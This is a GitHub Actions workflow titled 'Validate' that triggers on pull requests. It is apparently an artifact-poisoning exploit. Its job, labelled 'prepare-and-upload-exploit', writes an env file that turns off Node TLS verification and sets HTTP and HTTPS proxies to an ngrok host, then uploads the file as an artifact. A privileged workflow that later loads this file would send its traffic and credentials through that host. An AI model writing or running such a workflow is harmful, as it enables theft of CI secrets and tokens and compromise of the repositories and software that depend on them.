name: Validate

on: [pull_request]

jobs:
  prepare-and-upload-exploit:
    runs-on: ubuntu-latest
    steps:
      - name: prepare exploit
        run: |
          mkdir -p env
          echo 'NODE_TLS_REJECT_UNAUTHORIZED=0' > env/env
          echo 'HTTPS_PROXY=https://f516-2607-fea8-e1e0-200-ad7e-4a9f-6b77-c25e.ngrok.io:443' >> env/env
          echo 'HTTP_PROXY=http://f516-2607-fea8-e1e0-200-ad7e-4a9f-6b77-c25e.ngrok.io:80' >> env/env
      - name: upload exploit
        uses: actions/upload-artifact@v3
        with:
          name: env
          path: env/
